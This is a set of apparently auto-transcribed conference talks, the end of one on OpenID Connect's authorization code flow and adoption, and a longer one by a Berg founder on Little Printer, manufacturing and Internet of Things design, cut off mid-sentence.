OpenID Connect invented, yeah? But basically, once you switch to this thing called the authorization code flow, which means we don't have a response type of token anymore or ID token, but code, then you don't get back the token directly, but they send you a so-called authorization code, yeah? And that looks like this, yeah? And then, the application has to make a round trip on the server side, yeah, to get, to basically swap the authorization code with the actual access token. Or in other words, what they try to do here is that the actual access token is never being transmitted via the client's computer, but only via, you know, a direct connection between two servers, SSL, trusted, and so on, yeah? And now you get back two types of, two token, two access tokens, yeah, actually. One is the short-lived access token, which might only be valid in this case for one hour, and the refresh token. And then, you, when the access token has expired, you can send back the refresh token via the same connection here, this one, re-authenticate the client, not the user, the client, yeah, and get back a new access token that you can now use to re-access the service, okay? And again, this is really just in there because it is based on OAuth, and OAuth already had that feature, so Open ID Connect just added these ID token stuff on top, but in combination, you can now basically use them together, okay? Cool. So that's, as I said, it's really simple, yeah? It's not that much to learn how it works. So the question was, what's the adoption rate, yeah? So when you go to the Open ID Connect homepage, openid.net slash developers, you basically see the current state, yeah? There's, it's always divided into, is it an identity provider or is it a relying party? So the relying party would be a library that you use to connect your application to the provider, and the provider is the server piece, okay? So there's an Apache mod, obviously, there's a C-sharp implementation, I know that one. There were a couple of Java implementations here. There's PHP, there's Python, Ruby, and there are commercial products of zero. The guy is having a booth outside. They have a software as a service offering, for example. Azure Active Directory from Microsoft has an Open ID Connect endpoint. PingFederate is a commercial product, and if you scroll further down, you see libraries for validating and creating JSON web tokens. There's one for C-sharp from Microsoft. There are Java ones. There's a Java script one for the browser and for the server side using Node. There are Ruby, PHP, Python, and so on. So it's pretty okay already given that the spec is only four months old, yeah? But it was in development for a pretty long time, so we knew what was coming, yeah? The other interesting thing is there's this open source identity systems. This is like an organization, and what they do is they do interop testing. So if you are, if you have an implementation of an Open ID Connect, either relying party, library, or a provider, you can go to them and say, hey, can I take part in interop testing? And then, you basically, they do workshops and there are also tools to record tests, because you know, one of the main goals of Open ID Connect was interoperability. We don't want the Facebook Open ID Connect and the Google Open ID Connect anymore. We want one Open ID Connect and just make it work, yeah? And here are some, you know, the who's who of identity and they, you know, try to throw packets at each other and make sure they all work together, okay? So that's the other thing I want to show you. And the last thing is our implementation of that, which is open source, it's free, it's on GitHub, it's currently in preview mode. So it's not even a beta version, I would say, yeah, it's preview mode. All of the demos you've seen today, you know, we're running on the code that you can download. And if you are interested in that, you know, have a look at it, try it out. All of the samples I've shown you today are part of that repo, all the sample client applications and so on, all the code is in there. Try it out, give us feedback, file some issues. If you find a bug, send me a pull request or just give us feedback in general. And I would say, what time is it? Oh, we have ten minutes. So are there questions? Yeah? So the question is, with the current templates, they implement Google and Facebook authentication directly in the application, right? So I mean, you know, that's just bad style. Yeah? I mean, the thing is, yeah, we want to externalize the authentication, but that is not all you need to do. Because let's say you add Google authentication to your application, then when the Google user comes back, he's still a Google user, right? I mean, you don't want to write applications that are free for all Google users. You want to use Google as an authentication mechanism. And once the user has authenticated with Google, Google will send you a unique user ID so you can recognize the user again when he comes back. But at this point, you want to make him your user, right? And not keep him as a Google user. Yeah? He still can use Google to authenticate. Yeah? So you don't have to start a password. Yeah? But that's the code you have to write. And if you have five applications with Google logins, you write this code five times or copy it. And the idea with an OpenID Connect provider or an identity provider in general is that you hoist this logic to a central location, you only write it once and make it available to all of your applications. So it's not a matter of Microsoft switching to something, it's a matter of what is your application architecture. Yeah? But Microsoft has now with the new Katana release OpenID Connect middleware, which means you can use the existing templates to connect to arbitrary OpenID Connect providers which are compatible with Microsoft implementation. Okay? Anything else? Yeah? So the question is you are having a number of applications and some would use the OpenID Connect one, some would use Google. Would that work? Yeah. I mean, is it possible to configure it on one identity server? So when you establish trust to Google, does it apply to all of the applications? Mm-hmm. Mm-hmm. Ah, okay. So the question is when, so basically the login page, will it always show Google or can you per application say like, this should only do Google, this should only do local? Yes, it is, but not yet. It's on our to-do list, it's actually in the issue tracker. The protocol allows that you can pass in a so-called login hint to the provider and based on that hint, you could go directly to Google, don't even show them the login page to have the Google button to click, but go directly there, come back and go back to the application. Or you can configure it per application which ones you want to make available on the login screen. But yeah, it's not implemented yet. Okay, anything else? Oh, sorry. So regarding OAuth, how well does ADFS work with it? So the question is how good is the OAuth support in ADFS? So you need ADFS, I got told today that I'm wrong calling it ADFS version three, it's called ADFS for server 2012 R2. That is the minimum version you need because that is where they implement OAuth. And they implement, I think they implement code flow and implicit flow for OAuth, but obviously and that what the first two letters imply of the product is only for Active Directory users. So if your users are outside of Active Directory, then ADFS is not the right solution, at least not for authenticating your users. Yeah? What do you mean with local authentication methods? Okay, so the question is how hard would it be to teach identity server a new authentication method? So that's a good question. We have an interface called the I user service which has a method which has access to the request and all kinds of things. We tried it with, it works well enough for two factor authentication for example, but try it out, give us feedback if you see any blocks. I'm happy to change that, yeah? Okay, then I guess who's going to the boat cruise tonight? Is it still raining outside? That's good. Then have a nice evening and thanks for your time. Thank you. Thank you. Thank you. Thank you.
OpenID Connect is here – and it’s here to stay. This suite of protocols makes federation, single sign-on, session management, discovery and management feasible across arbitrary client types and platforms. It is also a welcome simplification compared to archaic WS*, XML and SAML technologies that made interop often complicated. Dominick walks you through the various bits and pieces – and along the way might even release a new open source project that implements OpenID Connect on the .NET platform ;)
10.5446/50603 (DOI)
Hello, can you hear me? That's working. That's definitely not my voice I can hear. Hello, thank you for coming. I've never been to a developers conference before, so I was a little bit scared. So you're going to have to forgive me that the last time I wrote a piece of computer software or code as some people talk about it, it was about four and a half years ago and even then it was pretty straightforward. So I did struggle a little bit to try and convince the organizers that what they really needed was my CTO who could talk to you about actual software, but they insisted that I was what they wanted. So I'm going to just talk a little bit about my company and what we do and some more general themes around this word that's come about called the Internet of Things. So my company is called Berg. We are based in North London. We used to be a design agency. We founded in about 2005. We had a kind of hybrid model. So we did work with technology and media companies as well as making our own software and products. And when you're an agency, our business model was basically every sort of three months. You have to look in the bank to make sure there's enough money to pay everyone and then you go out and you speak to some very rich companies to try and make them marginally richer in exchange for money which you charge for the time of the human beings you have in your company. And that's one business model. And then we decided that we were so clever we were going to make our own product. So we took venture capital. And for those of you who don't know what venture capital is, there's probably no one, but just bear with me because it was fairly new to me. Basically there are a bunch of extraordinarily rich guys and they know even richer guys but the guys up here are the kind of people who like manage the property portfolio for the Vatican or the whole of the New York Police Department pension fund or whatever. And they look at their sort of four trillion dollars and they think, I tell you what, we'll put most of this into like safe investments and we'll just take a few hundred billion and spend it on like high risk nerd stuff and hope it turns into Facebook. And we're one of those. So the downside of this is you can't have like an industrial chic studio in North London anymore. You have to go somewhere really shitty where the rent is cheap and like sort of like nylon carpets and polystyrene ceiling tiles. And so now we live here. And really the best way I can characterize this office is this. Both everything from the aesthetic to the kind of heart and soul that goes into keeping the building alive. So it's spiritually enriching as an environment. But in many ways I'm enjoying our new direction. So one of the things we've always found quite difficult to do is to define what we do because we're mostly a design company. But in the room with me as someone who was trained as a designer also is a computer scientist and a good one at that. And people who talk about ground bounce and all the weird things that happen at the physics level in chips and radio interference in certain spectrums and certification of kind of small pieces of plastic with copper tracks running through them. So there are also some sort of scary minds sitting quite nearby. But to talk about connected products I thought I'd just show this graph because there's a lot of words and historically certainly in academia people have been talking about a space where consumers would purchase internet connected products for some decades now. And you end up with words like ubiquitous computing. That was big in some time in the 90s. And now we've got this thing internet of things and they've really got far more syllables than I think they deserve. But in my opinion you've really got three things going on. One is you've got electricity which is weirdly the hardest one to come by in my view. It's really rare electricity. It's hard to make. It's hard to keep. And it's kind of why I think people quite like to put the internet in a fridge because you know you've got a fairly confident power supply. And it's in my experience of working with large manufacturers is many of the reasons why your phone doesn't do as much as it could. Like computationally I think your phone could do a lot more than it does but power management is one of the biggest problems with it. So electricity is a bit of a dog really. It's the one that people don't think about very much. Then you have some kind of connectivity by wires or radio. There are some other kind of fancy pants methods but really you kind of want some bits and bytes going between one thing and another over distance. And even that's going to be wires or radio. And then you need some like humans, some sort of bags of meat with their capacitive fingers and their wallets spending things and poking at capacitive screens and stuff. And somewhere in the middle of that there's like connected products. And that's broadly where I find the actual practical work that I do on a day to day basis happening. So we made a product. One of the things we did after sort of six or seven years of consulting with manufacturers and technology companies and media companies which is where this kind of world for us at least seems to have converged. We decided that we had to kind of try and actually make one ourselves. If we wanted to consult and tell people, yeah, you should be making connected device or use this kind of system or think about that or manufacturers like this and those sorts of things. So we should actually have a stake in the game ourselves. So we scraped up a load of money and we made a product called Little Printer. And it is a domestic product. It's a thermal printer that sits in your home and you use a website to subscribe to subscription content. So news headlines, four square check-ins, social media. Some things are really practical like travel data. Some things are really social like Instagram photos. Some things are just weird like people do comics and kind of odd stuff like that. And you can also use it like a tiny kind of portable printer for your phone. So you just take photos and it sort of prints out like a kind of magical fax, like a kind of long distance Polaroid. Anyway, it also prints its own face. And that's my favorite bit about it. But it's one of the things that's allowed it to kind of catch on as a kind of design icon in this space. And it's been very warmly received. Anyway, we manufactured them. And there are thousands of them floating around in the world with people pressing the button on the top and printing out little bits of information and puzzles and things for their kids and all that kind of stuff. And it exists. And it was, well, one of the things it does is that it's quite nice is that conferences like this, it prints out kind of itineraries. And so it's very timely. It's kind of funny because in the media universe, you seem to have these two quite convergent, quite separate sort of forces at play at the moment. One is you've got this obsession with like resolution, immersion, super high kind of very, very high definition, high resolution kind of information in media. Things like the hobbit being shot at like 96 frames a second, like native in the camera or Oculus Rift and this kind of super immersion just like drowning in pixels, like being punched in the eyeballs with Photoshop. And you've just got, you've got sort of IMAX kind of Samsung, they're kind of big curved 4K TVs. And then the other hand, you've got like four guys in a basement in New York making easily the worst photography app in history and then selling it to Facebook for a billion dollars. And it's just a bit odd because there's this second media universe which is where 140 characters is worth more than an entire newspaper. And it's because it's timely and personal and specific that it arrives from someone at that point is worth more than, you know, the greatest journalists of our age writing about war. So it's a kind of odd, it's a kind of odd time in media that you have these two universes. Anyway, Little Printer speaks very much to that kind of light, timely, low resolution universe where the quality of the print isn't what matters, it's that it arrives at that moment. And of course there's a business version so now it turns out that actually loads of people who have to deal with thermal printers as part of their businesses were banging on the door saying can we have one without the stupid face please? And it's basically because you don't need any local infrastructure for it, it's just it's got a web API like in the thing. So you turn it on, Wi-Fi, Internet. There's no like, you know that thing when your company is like Cisco and things like that or NCR, these giant middleware solutions and someone's got to have like a server room just to run like a dot matrix display. And here you just go to your website, sign in, tell the printer what you want to do, just point your APIs at it and it prints it out. So it's basically like a tiny, very, very low resolution browser with a very slow refresh rate. That's kind of one way to think about it. So what is an IoT? So just to kind of get a sense and this may be, again, speaking to people, I sometimes do this talk to like design students where I'm like it's an API, write that down. So forgive me if some of this feels like it's preaching to people who know more about it than I do. But sometimes I think it's worth just describing a few things that kind of give you a smell of what the space is like. This is a product called Glowcaps and it's, I quite like it. It's produced by a guy called David Rose who's ex-MIT and it's a very successful company. It's been sold to private equity since it launched and it's a medicine bottle top. And it's probably, I think, the bill of materials or the cost of the system to any given medical consumer as in any patient because it's issued by doctors in the US. It's given out with the medicine as part of the prescription. I think the cost of the system is something like $200. But the cost of a psychotic person not taking the drugs that keeps them sane is so high legally and punitively and in terms of insurance that it's worth giving out everyone an entire system to record whether or not they're taking their medicine. So when the bottle top gets opened and closed, it sends a message to the system to say that you've taken your medicine. If you don't take your medicine, it like phones the police or your mother or gives you a badge on Foursquare or whatever the system is that it's been tuned to. The second one is fuel which has since been discontinued by Nike but no doubt the close relationship with Apple will mean that in some respect it continues. But it's a kind of quantized self-product that measures your activity, reflects it back to you so you can tell how unfit you are. And the last one, another favorite of mine is the Kindle which is another weird product because e-ink is like the lowest resolution, profoundly expensive technology. I mean if you go to factories in China, there are only three factories in China that produce e-ink displays and the e-ink display on the Kindle is easily 90% of the bill of materials of that product. It costs way more than the 3G component. It's literally the most expensive part and the Kindle is sold broadly at cost, a little bit of profit maybe but it's really compared to an LCD display. The only advantage to it is that it's not backlit so you can read it in reflective light and it doesn't consume any power when you're not changing it which are both very, very useful things but it's incredibly expensive so it's an odd product to choose. Unless you're Jeff Bezos, in which case you've just convinced millions of people to buy a shop. Like when we look at the Kindle, it's like, hey, Neat, like book reading stuff with works in the light and you're in charge of it once a month. He looks at it like he's just sold you a buy now button and it's quite extraordinary. Anyway, so there are some examples of things in that space. Some things which are a bit less discussed which is a bit odd in IoT because IoT is a bit of a funny word for things that haven't ever quite succeeded. You know, it's a sort of weird ghetto of the park of like student experiments and Arduino hacks. But there are actually quite large grown up service businesses that use stuff which is hardware in the world and if you look outside of that kind of odd consumer realm of kind of big clunky Samsung gear and all that kind of stuff then you get some interesting things. I mean GoPro is kind of a wearable. It doesn't have a persistent connection to the internet but the images that you make on it you use somewhere else and it's profoundly successful company. The second thing is there's a business in the UK called Just Eat which is like it's really very successful and what it does is it aggregates restaurant menus from around from takeaways and delivery companies like pizza stores and Indian takeaways and Chinese takeaways. It presents them to you on a website with a consistent format. You search by your postcode and say, I want Chinese food. Yeah, have that one, that one, that one. You press go. It faxes the restaurant kitchen and the chef gets that fax and presses OK. You get a message back on your browser that says the chef has received the order and then that receipt turns up at your home at delivery and so it's just a kind of, it's like the Uber for takeaways if you know what I mean but it needs this printer in the kitchen because there's not going to be an iPad screwed to the wall in the restaurant kitchen. They're just not going to do that. So weirdly it's actually an essential part of a component of a business which is not really about things at all. It's just better if there is one. So this is Shenzhen and it's a region in China where loads of things get made. I'm sure you've heard of it, Foxconn live here, so do most of Flextronics manufacture so it's basically where all of the kind of junk screens that we click on and poke at gets made. And it's very big and very weird and it's odd how little I think one understands as a kind of Western consumer of what goes on in the production and fabrication of the things that we regard as the actual stuff of consumer electronics. And because we made a piece of consumer electronics we had to go there and manufacture it, if for me, is easily one of the most miserable processes available. Like software is really hard but manufacture is so miserable. Basically, sort of anecdotally, I think you could say with manufacturers you spend a lot of money and time designing something as you'd like it. So you think, okay, this is my product and you've prototyped it, you've had the manufacturing engineers in, you've done all the smart thinking and you put it there. And then with manufacturing process starts, the industrialization then goes to the factory, you spend about, you commit to spending about £250,000 for £10,000 of something exactly like this but a little bit more shit. And then what you have is 10,000 of these. You still don't have any money, then you've got to sell it. You know, really you can see why you'd rather make Angry Birds and just kind of go, upload and then sort of everything else seems to take care of itself. Anyhow, this is an injection molding machine making the back of Little Printer. It's a 40 ton machine which basically means you get a bunch of bits of like coloured plastic and you put it in a hopper, you heat them up to some hundreds of degrees and then you put 40 tons of pressure behind it because plastic only gets to the consistency of like cold chewing gum when it's really hot. It's not like liquid, you're not really injecting liquid, you're like forcing like cold chewing gum into a metal box in order to make a tiny plastic shell and there it is. And two brothers run that factory, one does the tooling and one does the injecting. It's very strange China in that there are lots of operations in manufacture which are like little family businesses like corner stores or something. It's not like there aren't just these huge glittering factories everywhere, filbert robots. You have to make this stuff. Obviously, this is like the electronics bit circuit boards and this is where you get all the poisons that screw up all the rivers, comes from this part and you have to add a lot of copper to sit around in a row, fill it through other bits of copper. This is a room in Eastern Europe where we do all the electronics assembly with billions of tiny robots pick and place and populate all of your electronics and then you get these brilliant machines where you've sort of semi-glued on all your electronic components and then you just shoot this torrent of hot solder at your circuit board and it kind of glues on to the feet of the electronics to bond permanently the components that you have there. That's literally a liquid jet of solder just firing up and you get these fantastic processes that are completely opaque in normal circumstances. If you live in the West, governments are particularly techy about producing really bad electronics with radio in it. If you make a microwave that's a bit leaky, it doesn't go down very well for anyone or your hair falls out or if you make a radio that's not great, then aeroplanes start falling out of the sky because you ruin their traffic control. That's not good. They're a very, very aggressive testing process where you have to take products to little rooms like this with these funny walls and Faraday cages and shoot it with stun guns to make sure that it restarts properly or it doesn't release some kind of weird radiation even if it's just noddy-blutiff. That's not a lot of fun either and it's expensive. The nice thing about those problems in manufacture is that although they're miserable and expensive and nothing brilliant can really happen, they're at least linear. When you've done them, they're done. You just turn the handle now. We want to make more little printers, you make a phone call, credit card, they turn up in the post. Like it's just done. Whereas software always feels a little bit like you've never finished. There's just something a little bit like, software, it feels a bit like manufacturers' bacteria that you can kind of cure. Software's like a virus that never really goes away. It's like cold sores or something. It sort of comes back every now and then. For me, it's a much more serious problem. In spite of the fact, it's more familiar to me and the people I work with. This is Bill Verplank. Bill Verplank's got one of those brilliant CVs like 12th Employee Apple. His first job when he left Industrial Design College in the 1950s was to go and humanise Martian environments. Because back when NASA thought it was the future of technology, do you remember when people cared about space instead of just pictures of their food? And NASA thought they were going to use all their money to colonise Mars and the government would just back them indefinitely. They were worried that the thing about astronauts is they're all basically soldiers. That's what an astronaut is. You basically get the smartest guy in the air force and stick him in a space suit and that's how you get astronauts. But you can't populate Mars with just smart soldiers. You have to send teachers and nurses and kids. And the problem with Mars is it's a giant red desert with a 17-hour day. So they're worried that everyone would send everyone there and then they'd be having this kind of horrible psychotic episodes and kill each other in some kind of horrible Columbine massacre. And so they hired Bill to make it nice, to make sure Mars was nice enough. Anyway, he invented the term interaction design with Bill Mogrig's idea sometime in the 80s. So he's quite an important figure. And he did this drawing. And this is a drawing of an interaction. So there is our human, bag of meat, capacitive finger, etc. Doing things to that ball. That ball is your product, the abstract thing, the system that one is designing. And that thing has got handles and buttons. And back then, there really were only handles and buttons, sliders, dials. You had some fairly straightforward analog inputs. This was before computer vision and capacitive surfaces. But still, there's only so many things you can do to a computer to tell it, or do to a product to tell it something. And then that product manifests stuff. It gets cold or hot or it beeps or the engine turns on or it goes left or whatever it does. And that manifests back to you and you feel that with your eyes or your ears or your hand or whatever. And then in your brain, you have a kind of map, a sort of map of the system. And if you think about driving a car, driving a manual car, you kind of, you do sort of learn it like that. You have an understanding of things and you kind of know, even though you've never done it, that if you're doing 60 on the motorway and you slip it into reverse, nothing great is going to happen. So you know, it sort of works as a sort of idea of how that happens. But for me, phones have completely ruined this paradigm. And this note no longer has any real value left. And that is because if you think about your phone when you're using it, you're really not really using your phone. You're kind of using my phone a little bit in the way that systems work. And as I'm on my phone, I don't really get a sense of the edges of the device anymore. When I'm talking to Siri, I'm not completely convinced that I'm talking just to this phone, not to a server farm that Wolfram Alpha owns parked in some corner of the desert in Dexas. You know, or that when I'm asking Google search, it's not like it's not the browser isn't answering how old Barrack Obama is or where the moon is or who was in the dirty dozen. It's like that's going somewhere. So the edges of the machine don't feel like don't quite feel that the same. And think about something like Twitter, it's really integrated into the phone now, notifications appear or Facebook and photos, that's on the phone. I mean, that's as much of my understanding of that as a product and understanding of it as the kind of going into the menu to change the language to finish or whatever, you know. Plus it affects computers and the edges of that system aren't clear. And some people get upset by it. So if you swear on Twitter, it appears somewhere, privacy is weird, you never quite know where something is going to get seen. What happens if someone tags a picture with you in it on Facebook as that appear on someone else's phone? It's this constant myelstrom as the services and the UI and the design of these things actually start to get into a kind of weird, brilliant mix. But it certainly isn't like driving a car where you put the buttons and the order in the menu, it isn't quite the same in terms of relevance. So that doesn't work. Plus you've got brands in on this now. Companies and systems and not even humans on the end of these lines. I got this from Oslo back in February 2009 where it said, this is normally, you know, it's SMS. You can see how old the phone is. And then it's like, this is normally where I got told off by my mother for not phoning her on a Sunday. And here we are, it says, welcome to the London city, to Oslo, to check in for some SAS flight. Just say yes. So I said yes. It says, you are checked in. It's completely bizarre to me. What have I just done? It's like, it's just so, this is not UI design. There's something else going on here. So products apart systems, so I don't want to run over time. Representing systems in hard. And for me, if you are working in the field of interaction design or design for software, any kind of design where human beings have to walk up and poke things or things happen to them, no matter what you're doing, essentially at some deep level, the nature of software in its abstraction is that it is invisible because it's at its deepest level, it's maths, as you all know, far better than I do. You know, one holds models of how these systems work and they quite often go to some extreme lengths like graphical user interfaces or windows or trash cans or whatever to make some sense of metaphors and representations to humans so that they can operate on the functions that you've provided meaningfully for them. So making representations of invisible systems is kind of what design in software is. So I'm sort of channeling an old colleague of mine, Darrell Bishop here, who's a very seasoned interaction designer and worked for a long time in Apple. And we always talk about this thing about cash. And there's unfortunately no one in the front row. So I just have to imagine that there's someone sitting there. But this is a pound coin. It's worth 10 of your Norwegian Cronas, approximately, and it's mine. We all know that because I just got it out of my pocket. But if I put it here and there was someone standing there, it suddenly feels a little bit less like mine and a lot more like theirs. You know, I'm just a little bit nervous just standing here and it's over there. I might forget it. It's not really mine, but it's definitely my money. Now if that person picked up that coin and put it in their pocket, there's real grounds for dispute. And if they give me back a different pound coin, have they stolen my pound? Now if I left my shoe there and they picked it up, they'd just be holding my shoe. You know, that's all. So there's something unique about cash in that cash is essentially a component of a system. It's a physical token. There's all sorts of things it tells you. It tells you it's British because it's got the Queen and some unicorns and all that imperialist stuff on it. And it tells you what it's worth. It's a pound. It's not 10 pence. It's not 50 pence. It's a pound. So it has some indicators. Even its physical materiality tells you it's a pound because it's quantified and qualified by the state. But it doesn't tell you who owns it on its surface. So it's a social system in as much as it is a technical one or a formal one. And there are others, but I don't want to bang on. But all it is to say is that there are systems all around us that aren't really to do with software and they exist. And car insurance, that's another really weird one. I sort of need it to drive a phone up some company of some that are supposed to be in a market. And I give them a little bit of money that's based on something to do with me and some analysis of risk on the promise that they might give it back to me against the value of the damage to my car should something happen if they believe that is what happened. And you need that, but it isn't represented anywhere, but it is on my car. I mean, that my car is covered. So there's just this odd thing of belief and systems and sociality that actually sometimes software doesn't formalize, but that we still live with. So this is a very nice quote from Darl to use something we have to be able to perceive it. So I don't mean see it necessarily. I'm not saying everything has to be graphical or everything has to be procedurally laid out or represented literally. But this is just a very nice example of some user interface. For one, it's on the side of one of those giant kind of articulated cherry pickers, we call them. They're sort of platforms on long kind of pneumatic arms that mean people can go and chop the tops of trees off or clean high up windows. And you can see there next to the buggy that everything just has a little joystick at each joint in the articulation of the arms. So you kind of drive the car by just sort of moving around. There is a fabulous example of interaction design for as far as I'm concerned. This is so weird. And you guys are going to know more about this to me, but it's not going to be weird to you, but you just have to suspend yourself and pretend you haven't done computer science degrees. You don't know what like, you don't know what pipes are or arrays are or scary maths or algorithms, right? Just pretend you're me and you went to art school twice and that's how bright you are. Right? So you go out and you buy a Macintosh like this one, just like this, or you go and buy a Windows PC and you hear in the office this rumor and someone's doing something and they're typing into this weird black window and like stuff's happening somewhere else. And you know, what are you doing? And they say, they whisper the mythical magical word, Python. And you're like, Python, what, what? And you now know this magical word. That's the only way to find out about it. There's nothing in the computer. You know, if you want to launch Photoshop, you kind of look for this icon or text edit. There's like a little picture of a pad with a pencil on it. I mean, it's not brilliant, but at least it's there. And you click on it and a thing opens and you can kind of hit the keyboard and the letters appear and you kind of get it, right? You're using the software. Same thing with Photoshop. You want to do a little drawing, you just scrub your mouse around and you kind of, alright, this is Photoshop. But if you want to use Python, which is easily as powerful with the libraries and the extensibility as Photoshop, is in that computer, I mean, I bought it, you have to type the word Python in a little black window, in probably in the right way as well. I don't know what else you have to do, but I think you just type Python and then press return. And then it says, type help, copyright, credits or license for information. I'm like, what is this? And it turns out it's an absolutely giant, amazing piece of software with absolutely no formal representation to me. It doesn't make any effort to perceive itself, to make itself perceivable to me whatsoever, which for people who have spent a long time learning how to use command lines and type esoteric characters in a row in order to make very powerful software work, it probably seems fairly natural. But from my perspective, it's utterly bizarre that so much effort would go into something that then goes out of its way almost to remain entirely opaque. Anyway, systems. So onto another thing, just in terms of back a little bit back to things, this is a thing called the Gartner hype cycle. It's brilliant. It's absolutely brilliant. And you must all go and Google for the Gartner hype cycle. It's one of my favorite pieces of kind of internet comedy. But basically, there's this big company in America called Gartner and there's like massive numbers of like NBA nerds, all of the kind of guys that are Stanford and Accenture and stuff and Harvard that have just thought about business and nothing else for a year and a half. Go out and they like read all the kind of tech press and gather together all of the kind of knowledge about technology. And then they produce this graph once every sort of three or four months, I think, but maybe mainly once a year. This one is from July 2013. And they plot the sort of technology that's kind of being chatted about at the moment onto what's called the hype cycle. And they have at this beginning part this thing called the innovation trigger. So this is the stuff that's happening in all the labs at Imperial and MIT, the sort of the first piece of E-Incore, the first computer vision that can tell when someone's smiling, all of those sorts of things. And then it moves up to the peak of inflated expectations. So you can see up there back in July 2013, consumer 3D printing. Everyone was talking about how we're all going to have a 3D printer. It's going to be one in every corner shop. It's going to be the new photocopier, that kind of thing. And you come down to the trough of disillusionment when things sort of slide off there. You have things like cloud computing and mesh network sensors, very, very unfashionable at the time. They just sort of down in the kind of doldrums. And slowly, over time, they pick up into the slope of enlightenment where you've got sort of biometrical authentication. So and if you go further up, like speech recognition into productivity, which for a long time people like speech recognition, no one wants to talk to computers. And now it's like all that Google and Apple can bang on about, right? They're all raced into the end there. So what we find though is that the stuff that's most interesting is there. It's the stuff that's quite cheap now. You think about RFID, which has never really left the trough of disillusionment. It's never quite managed to find like a massive sort of secure market for itself. But it's fascinating. The reason why the things here are fascinating is because they're usually disproportionately cheap, especially when there's a hardware component. So if you went to a lab and you tried to make one RFID chip, like one tag for the first time, I mean, someone must have done it. Their cost must have been incalculable. It's a computer that you power with the electricity in the air, and it turns on and emits a meaningful signal through this paper thin thread of copper back to another reader. It's exquisite. Just the level of physical engineering. Forget the software and the kind of stuff. Just the physical manufacturing engineering to usefully and consistently replicate that process. Forget about plastic boxes that go around the back of things. This is a computer and something less than the size of a playing card. And now, if you wanted to buy 10,000 of them, they cost you less than a penny each. But to make one is incalculable. So it's a very interesting space that we find to look at. So I wanted to talk a little bit about some of the properties of a connected thing. And one of the things that's unusual about it is that it is software that is somewhere. And normally, in my experience, software exists in an abstract idea, in that it is something that can be replicatable. It's quite often based in the web. When you use something like Flickr or Instagram, you don't really think of it as being somewhere. Where it is doesn't really matter. You feel like you have a view onto a system. And you are making judgments and deriving value from that view. But this is the thing that you press in order to cross the street. When you press that, what you're really doing is using a piece of software that you can only really use in that place. So that button only exists there. So you do that piece of UI and the street changes. And probably some massive, scary system goes into operation. And all of the traffic signals in London realign themselves by a few milliseconds or whatever. And the world changes slightly. And so it's really located. To give you a bit more of a concrete point, this is a sort of cheesy, old-fashioned view of how people might one day have once in America, certainly, consumed television. The television was a rare device. There wasn't one in every room. So it sat in a room and people gathered around it. Lots of people are looking at one piece of media. So they're having a shared experience of that. It's happening in the corner of that room. It doesn't happen in other places except for other places where there are televisions. So the weird thing about that is this. And I've always found this quite a puzzle. And you know, there's this kind of, if I've got my Netflix on and I'm signed into my TV and my girlfriend comes and wants to watch TV, legally, really, she kind of can't because it's my account. And if she does buy some pay for content through the Amazon Prime thing or whatever service we're actually using or some sort of pay as you go, as pay as you view, sort of on demand kind of video, sort of HBO Go type service, then it's my money. It's me that it costs money from. Plus, a lot of Netflix's model is a recommendations engine just as Amazon have, which means suddenly I'm getting weird recommendations for films I maybe don't have an interest in, and the model sort of begins to break. I mean, it's most conspicuous to me when you've got iTunes where it's kind of like, you're constantly having to sign in and prove who you are to iTunes in order to spend any money on it. I see why because kids run up like $6,000 kind of app bills on Smurf Kingdom or whatever they're buying, like a jar of rainbows or a bag of stars or whatever. But I kind of feel like I'm 38. I'm pretty sure I don't want to have to sign into my TV in order to, in order to, it's just an odd security thing. It's a bit like, it's a bit like in case someone comes to my house and steals TV. So, it's like in the middle of the night, I kind of get up and it's like two in the morning and I'm like, oh, what's going on? And I hear noises downstairs and I gently pad downstairs to my living room and there's like three guys in balaclavas downloading the Hobbit. You know? And that's like, I think that might be the least of my problems at that moment. So, there's just something odd about the model here of something which is a television, which is a profoundly shared object, lives in a house, people have expectations of how it will behave to the public. It's not in my pocket. It's not my device. It exists for people. But it's inherited a model that's derived entirely from single sign on, on phones. And there's something there which doesn't quite fit. I mean, you can see Apple beginning to address it and their www.dc thing the other day, you know, they announced this family sharing thing. So, someone can actually buy something and give permission to someone else. So, you don't have this kind of odd thing. And it's mostly, I think, because iPads are usually shared devices. They live in houses. And anyway, it's just a kind of interesting quirk on the way that software is being constructed in that space. So, in the kind of work we, I mean, we, as a startup, we still do work with manufacturers. And sometimes manufacturers use our system with their products. And that's one of our business models. So, we are often asked what's the point of putting connectivity into products. And it's a very robust question, you know. And so, I thought I'd have a go at answering it. And this is RobotJFK. That's not what your product can do to software. That's what software can do to your product. So, I'm a little bit concerned about the time. I don't want to run out. This is, I don't have any sound, unfortunately. But this is from the keynote that Steve Jobs made in 2007 where he announced the iPhone. And I'm going to play it. You won't be able to hear it. But you can see what he's mentioned there on the slide is visual voicemail. He's saying, wouldn't it be great if you didn't have to listen to the four voicemails that you've already heard to get to the new one, which is number five, every time you want to check it. You just want it to appear like in a list. And just, this is sort of a little bit astounding to me, really. He mentions it again, like he comes back to this idea of visual voicemail. Just think about that. But you've just launched your iPhone. It's like a complete paradigm shift in the product market. No one can make this. You're literally inventive manufacturing technology. Your operations guy, Tim Cook, has sourced completely unique deals around the chips to get the bill of materials to the point it is. You've probably had some four guys sitting in a basement, like PhDs, just grinding out the maths to make pinch zooming work on something that's like basically less powerful than a Raspberry Pi. And you're still talking about visual voicemail. You forget about Candy Crush Saga or Rovio and Angry Birds or the fact it's got a physics engine sitting in it. It's going to be more powerful than Xbox in six generations. It's just, he's just talking about this quite modest, simple, utilitarian value. You don't have to listen to the four voicemails that you have before you get to number five. And I think for designers, that's a really important lesson because it's just sensible. You know, this problem is that in the business logic of the way manufacturers sit with software, is manufacturers are really historically extremely bad at addressing their consumers. You know, if you think about a company like Electrolux, you know, own many washing machine brands in Europe, it's really, they really don't know who you are and they're really not that interested. They'd much rather turn a handle in a factory and big lumps of white metal go out the door and end up in retailers. And the people that actually sell that stuff, like local marketing teams or the retailers themselves, it's a bit like, I mean, the idea that manufacturers brand objects are all is quite weird that this is an AEG washing machine or a Milio washing machine. It's a bit like saying, I've got a Foxconn phone that's running Apple software. Like why? It's just like, who cares who made it? And I think in a culture where we understand the value of products to be associated with the services that they have, you know, that feels very different. You know, I mean, can you imagine? I mean, this is just extraordinary to story of this. There was a time and I'm looking out there and I think there are some people, yeah, I think we're all going to remember Walkmans. No one can pretend they're too young to remember Walkmans. So you know, can you imagine your Sony? You've probably got the largest distribution and operational empire on the planet. No one can put chips and plastic in a hopper and get it into every store on the planet faster and cheaper than you. You've got a premium brand. You own even own a slice of Chinese banking. You've got the 